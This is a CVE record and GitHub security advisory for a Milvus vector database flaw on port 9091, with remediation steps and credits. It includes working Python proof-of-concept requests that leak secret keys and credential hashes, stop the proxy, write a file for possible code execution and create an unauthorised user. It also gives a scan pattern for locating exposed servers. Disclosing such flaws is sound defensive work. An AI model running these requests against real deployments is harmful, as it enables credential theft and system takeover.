Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus exposes TCP port 9091 by default, which enables authentication bypasses. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation. The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management. This vulnerability is fixed in 2.5.27 and 2.6.10.
PUBLISHED5.2CWE-306
Milvus Allows Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise
Problem type
Affected products
milvus-io
milvus
< 2.5.27 - AFFECTED
>= 2.6.0, < 2.6.10 - AFFECTED
References
https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6
https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6
https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9
https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9
https://github.com/milvus-io/milvus/releases/tag/v2.5.27
https://github.com/milvus-io/milvus/releases/tag/v2.5.27
https://github.com/milvus-io/milvus/releases/tag/v2.6.10
https://github.com/milvus-io/milvus/releases/tag/v2.6.10
GitHub Security Advisories
GHSA-7ppg-37fh-vcr6
Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise
https://github.com/advisories/GHSA-7ppg-37fh-vcr6Summary
Milvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:
- The
/exprdebug endpoint uses a weak, predictable default authentication token derived frometcd.rootPath(default:by-dev), enabling arbitrary expression evaluation. - The full REST API (
/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.
Details
Vulnerability 1: Weak Default Authentication on /expr Endpoint
The /expr endpoint on port 9091 accepts an auth parameter that defaults to the etcd.rootPath value (by-dev). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:
- Information/Credential Disclosure: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via
param.MinioCfg.SecretAccessKey.GetValue(),rootcoord.meta.GetCredential(ctx, 'root'), etc. - Denial of Service: Invoking
proxy.Stop()to shut down the proxy service. - Arbitrary File Write (potential RCE): Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.
Vulnerability 2: Unauthenticated REST API on Metrics Port
Business-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via registerHTTPServer() in internal/distributed/proxy/service.go (line 170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.
An attacker can perform any business operation without credentials, including:
- Creating, listing, and deleting collections
- Inserting and querying data
- Creating, listing, and deleting user credentials
- Modifying user passwords
Proof of Concept
PoC 1 — /expr Endpoint Exploitation
import requests
url = "http://<target>:9091/expr"
# Leak sensitive configuration (e.g., MinIO secret key)
res = requests.get(url, params={
"auth": "by-dev",
"code": "param.MinioCfg.SecretAccessKey.GetValue()"
}, timeout=5)
print(res.json().get("output", ""))
# Retrieve hashed credentials for the root user
res = requests.get(url, params={
"auth": "by-dev",
"code": "rootcoord.meta.GetCredential(ctx, 'root')"
}, timeout=5)
print(res.json().get("output", ""))
# Denial of Service — stop the proxy
res = requests.get(url, params={
"auth": "by-dev",
"code": "proxy.Stop()"
}, timeout=5)
# Arbitrary file write (potential RCE)
for cmd in [
'param.Save("proxy.accessLog.localPath", "/tmp")',
'param.Save("proxy.accessLog.formatters.base.format", "whoami")',
'param.Save("proxy.accessLog.filename", "evil.sh")',
'querycoord.etcdCli.KV.Put(ctx, "by-dev/config/proxy/accessLog/enable", "true")'
]:
requests.get(url, params={"auth": "by-dev", "code": cmd}, timeout=5)
PoC 2 — Unauthenticated REST API Access
import requests
target_url = "http://<target>:9091"
# Create a user without any authentication
res = requests.post(f"{target_url}/api/v1/credential", json={
"username": "attacker_user",
"password": "MTIzNDU2Nzg5",
})
print(res.json())
# List all users
res = requests.get(f"{target_url}/api/v1/credential/users")
print(res.json()) # {'status': {}, 'usernames': ['root', 'attacker_user']}
# Create and delete collections, insert data — all without authentication
Internet Exposure
A significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:
http.body="404 page not found" && port="9091"
This indicates the vulnerability is actively exploitable in real-world production environments.
Impact
An unauthenticated remote attacker with network access to port 9091 can:
- Exfiltrate secrets and credentials — MinIO keys, etcd credentials, user password hashes, and all internal configuration values.
- Manipulate all data — Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.
- Manage user accounts — Create administrative users, reset passwords, and escalate privileges.
- Cause denial of service — Shut down proxy services, drop databases, or corrupt metadata.
- Write arbitrary files — Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.
Remediation
Recommended Fixes
- Remove or disable the
/exprendpoint in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default. - Do not register business API routes on the metrics port. Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.
- Bind port 9091 to localhost by default (
127.0.0.1:9091) so it is not externally accessible unless explicitly configured. - Enforce authentication on all API endpoints, regardless of which port they are served on.
User Mitigations (until patched)
- Block external access to port 9091 using firewall rules or network policies.
- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.
- Change the
etcd.rootPathfrom the default valueby-devto a strong, random value (partial mitigation only — does not address the unauthenticated REST API).
Credit
This vulnerability was discovered and responsibly reported by YingLin Xie (xieyinglin@hust.edu.cn). It was independently reported by 0x1f and zznQ (ac0d3r).
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-26190Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-26190",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-02-13T19:37:40.553Z",
"dateReserved": "2026-02-11T19:56:24.812Z",
"datePublished": "2026-02-13T18:44:33.465Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-02-13T18:44:33.465Z"
},
"title": "Milvus Allows Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise",
"descriptions": [
{
"lang": "en",
"value": "Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus exposes TCP port 9091 by default, which enables authentication bypasses. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation. The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management. This vulnerability is fixed in 2.5.27 and 2.6.10."
}
],
"affected": [
{
"vendor": "milvus-io",
"product": "milvus",
"versions": [
{
"version": "< 2.5.27",
"status": "affected"
},
{
"version": ">= 2.6.0, < 2.6.10",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-306: Missing Authentication for Critical Function",
"cweId": "CWE-306",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6",
"name": "https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6",
"tags": [
"x_refsource_CONFIRM"
]
},
{
"url": "https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9",
"name": "https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9",
"tags": [
"x_refsource_MISC"
]
},
{
"url": "https://github.com/milvus-io/milvus/releases/tag/v2.5.27",
"name": "https://github.com/milvus-io/milvus/releases/tag/v2.5.27",
"tags": [
"x_refsource_MISC"
]
},
{
"url": "https://github.com/milvus-io/milvus/releases/tag/v2.6.10",
"name": "https://github.com/milvus-io/milvus/releases/tag/v2.6.10",
"tags": [
"x_refsource_MISC"
]
}
],
"metrics": [
{
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
}
}
]
},
"adp": [
{
"providerMetadata": {
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP",
"dateUpdated": "2026-02-13T19:37:40.553Z"
},
"title": "CISA ADP Vulnrichment",
"metrics": [
{}
]
}
]
}
}